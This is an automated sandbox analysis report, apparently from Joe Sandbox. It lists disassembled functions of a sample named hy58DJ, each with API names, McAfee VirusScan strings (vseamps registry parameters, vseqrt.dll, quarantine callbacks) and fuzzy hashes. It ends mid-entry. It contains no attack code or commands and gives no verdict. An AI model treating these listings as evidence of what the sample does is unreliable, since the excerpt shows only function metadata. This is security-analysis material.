                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 93015348-1041928032
                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                      • API String ID: 3682727354-300733478
                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                      • API String ID: 2587151837-1427723692
                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                      • String ID: SetDllDirectoryW$kernel32.dll
                                      • API String ID: 3184163350-3826188083
                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3424473247-996641649
                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1775797328-0
                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 1232609184-0
                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                      • String ID: H
                                      • API String ID: 2107338056-2852464175
                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                      • API String ID: 1322048431-2685357988
                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                      • API String ID: 2984211723-3002863673
                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                      • API String ID: 678758403-4129911376
                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3424473247-0
                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                      • String ID: bad exception$csm$csm$csm
                                      • API String ID: 3766904988-820278400
                                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                      • String ID:
                                      • API String ID: 2707001247-0
                                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 849930591-393685449
                                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction ID: 0be66f063ac159947815202465fb8d83ae4550a8a8466b27eb6d5dd02ea51867
                                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction Fuzzy Hash: EDD1A3B2B08B4186EB21EF2694413BD77A1FB45BA8F1041B6DE4D5B766CF38E4A1C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 3013587201-537541572
                                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction ID: 9f4265715a642c0891b8c006718af80fc959518836ea229ed6f26e81fe55a460
                                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction Fuzzy Hash: AD41E061B19E0251EA16AB17A8106BA23A1BF45FB0F1845FBDD1E477A4FF3CE4668700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 1119674940-1966266597
                                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3702919091-996641649
                                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
